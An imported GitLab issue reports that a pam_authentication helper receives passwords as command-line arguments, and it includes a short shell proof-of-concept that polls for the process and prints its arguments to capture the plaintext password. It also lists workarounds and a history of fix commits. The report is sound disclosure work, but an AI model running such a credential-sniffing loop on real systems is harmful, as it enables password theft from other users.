pam_authentication leaks the password to unprivileged processes on the same machine
Created by: Quazgar
misc/pam_authentication/pam_authentication.c
gets the password via command line arguments, which is inherently unsafe. Other processes on the same machine can easily sniff the plaintext password, since the command line arguments are world-readable.
Small proof-of-concept, to be running on the same machine as the server during login:
while true; do
PAM_ID=$(pgrep pam_auth);
[ $PAM_ID"x" == "x" ] || {
echo "Yippie! PID(s) are: $PAM_ID";
for P in $PAM_ID; do
ps -q $P -o args=;
done;
echo -e "Yay!";
}
done
Possible workarounds: pass the password as an environment variable or through a pipe, either a shell pipe or a FIFO special file.
Imported comments:
By Quazgar on 2020-06-12T12:44:15.780Z
closed
By Quazgar on 2020-06-10T14:24:11.514Z
mentioned in commit ba63d1c1
By Quazgar on 2020-06-10T13:41:28.271Z
reopened
By Quazgar on 2020-06-10T13:41:28.090Z
Not fixed for LDAP (instead of generic PAM).
By Quazgar on 2020-05-06T09:41:59.457Z
made the issue visible to everyone
By Quazgar on 2020-05-06T09:40:44.322Z
closed
By Quazgar on 2020-04-28T10:45:16.255Z
mentioned in merge request !38
By Quazgar on 2020-04-27T16:57:40.067Z
mentioned in commit 285b94ed
By Quazgar on 2019-11-20T12:48:54.730Z
assigned to @quazgar and unassigned @timm.fitschen
By Timm Fitschen on 2019-09-11T15:03:22.339Z
changed due date to September 18, 2019
By Timm Fitschen on 2019-09-03T06:27:07.762Z
changed due date to September 11, 2019
By Timm Fitschen on 2019-08-29T09:58:37.272Z
changed due date to September 04, 2019
By Timm Fitschen on 2019-08-29T09:58:33.952Z
changed due date to August 07, 2019
By Timm Fitschen on 2019-08-29T09:58:01.788Z
assigned to @timm.fitschen and unassigned @quazgar
By Quazgar on 2019-04-11T08:08:23.732Z
made the issue confidential
By Timm Fitschen on 2019-04-11T08:08:23 (imported from GitLab project)